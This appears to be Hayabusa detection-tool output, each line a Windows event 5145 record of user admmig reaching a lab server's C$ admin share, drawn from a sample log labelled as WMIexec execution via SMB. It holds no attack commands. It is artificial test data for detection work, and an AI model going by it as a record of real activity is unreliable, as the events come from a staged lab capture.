+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
